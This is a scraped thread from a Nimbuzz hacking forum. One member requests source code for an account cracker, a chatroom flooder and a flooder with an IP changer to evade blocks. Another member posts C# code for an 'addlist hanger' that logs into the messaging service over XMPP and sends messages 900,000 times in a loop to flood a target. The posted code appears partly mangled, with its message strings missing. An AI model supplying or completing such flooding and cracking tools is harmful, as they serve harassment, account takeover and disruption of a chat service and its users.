NIMBUZZERGQ FORUM 2015-2017
HI GUEST WELCOME TO NIMBUZZGQ FORUM PLEASE REGISTER TO HAVE FULL ACCESS TO THE FORUM AND BE ABLE TO DOWNLOAD STUFF STAY WITH US THANK YOU



Forum Designer©️
NIMBUZZERGQ FORUM 2015-2017
HI GUEST WELCOME TO NIMBUZZGQ FORUM PLEASE REGISTER TO HAVE FULL ACCESS TO THE FORUM AND BE ABLE TO DOWNLOAD STUFF STAY WITH US THANK YOU



Forum Designer©️
NIMBUZZERGQ FORUM 2015-2017

HI GUEST WELCOME TO NIMBUZZGQ FORUM PLEASE REGISTER TO HAVE FULL ACCESS TO THE FORUM AND BE ABLE TO DOWNLOAD STUFF STAY WITH US THANK YOU


You are not connected. Please login or register

[source request] To - King.Cobra

View previous topic View next topic Go down  Message [Page 1 of 1]

1[source request] To - King.Cobra Empty [source request] To - King.Cobra Sat Nov 07, 2015 4:31 am

akshay1

akshay1
reviewer
reviewer
hi bro.
i am akshay.
iam nimbuzz user since 2012
i used all type of tools here. such as flooders,crackers,bots.

i am good in c# & vb.net

now i want to make cracker and flooder. please share code with me

1) 1 jid cracker (if d get cracked save immediately in text file in their folder)
2) auto flooder (room bomber) with speed adjustment and number of flood msg/ID
3) any type of flooder with ip changer.
4) search stylish ids in nimbuzz database.



thanks
Akshay

2[source request] To - King.Cobra Empty Re: [source request] To - King.Cobra Sat Nov 07, 2015 8:24 pm

Admin

Admin
Designer
Designer
HI BRO.
4) search stylish ids in nimbuzz database.

FARITA USE THAT SOFT.

1) 1 jid cracker (if d get cracked save immediately in text file in their folder)

Nuke haveing it, U cAN CRAck source CodE.

3[source request] To - King.Cobra Empty Re: [source request] To - King.Cobra Sat Nov 07, 2015 10:04 pm

akshay1

akshay1
reviewer
reviewer
Hey bro
thanks for quick reply.

whats about
2) room bomber
3) flooder with ip changer.

and i also want to know how to use tesseract ocr in Auto id maker
i have simple id maker source code. i want to make auto id maker.

we cant steal secured source code.
*which decompiler u are using ?

please if you have any idea please share with me.

and i hope you can make better forum than this forum.
your support is good.

thats why i want to suggest you make
Nimbuzz forum for all country and put other sections too.

4[source request] To - King.Cobra Empty Re: [source request] To - King.Cobra Mon Nov 09, 2015 12:20 am

top

avatar
Designer
Designer
we Will soOn Post source CodES

5[source request] To - King.Cobra Empty Re: [source request] To - King.Cobra Wed Jan 20, 2016 11:59 pm

sugnan

sugnan
reviewer
reviewer
bro see here am posting simple source code of addlist hanger :-


using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using agsXMPP;
using agsXMPP.protocol.client;
using agsXMPP.Xml.Dom;
using hard_addlist_hanger.Properties;


namespace hard_addlist_hanger
{
   public partial class Form1 : Form
   {
     
       private Random random = new Random();

       public Form1()
       {
           InitializeComponent();
       }
       XmppClientConnection x;

       private void button2_Click(object sender, EventArgs e)
       {


           this.x = new XmppClientConnection { Server = "nimbuzz.com", ConnectServer = "o.nimbuzz.com", Port = 5222 };
           this.x.Open(this.username.Text, this.password.Text, "hard-addlist-hanger" + random.Next(0, 999999));
           this.x.OnLogin += new ObjectHandler(this.connected);
           this.x.OnAuthError += new XmppElementHandler(this.failed); this.x.OnClose += new ObjectHandler(this.dc);
       }
       private void connection(object sender)
       {
           if (base.InvokeRequired)
           {
               base.BeginInvoke(new ObjectHandler(this.connected), new object[] { sender });
           }
       }



   
       private void failed(object sender, Element e)
       {
           if (this.InvokeRequired)
           {
               this.BeginInvoke((Delegate)new XmppElementHandler(this.failed), sender, (object)e);
           }
           else
           {
               this.username.BackColor = Color.Red;
               this.password.BackColor = Color.Red;
           }
       }

       private void connected(object sender)
       {
           if (this.InvokeRequired)
           {
               this.BeginInvoke((Delegate)new ObjectHandler(this.connected), sender);
           }
           else
           {
               this.username.BackColor = Color.Green;
               this.password.BackColor = Color.Green;
           }
       }

       private void dc(object sender)
       {
           if (this.InvokeRequired)
           {
               this.BeginInvoke((Delegate)new ObjectHandler(this.dc), sender);
           }
           else
           {
               this.username.BackColor = Color.Yellow;
               this.password.BackColor = Color.Yellow;
           }




       }

       private void button3_Click(object sender, System.EventArgs e)
       {
           
               for (int k = 1; k <= 900000; k++)
                   
                       
                       {
             x.Send("" + fm1.Text + "'");
x.Send("" + fm2.Text + "'");


}


                       }
       }

       private void button1_Click(object sender, System.EventArgs e)
       {
           base.Dispose();
       }

       private void button4_Click(object sender, EventArgs e)
       {
           x.Close();
       }

Sponsored content


View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum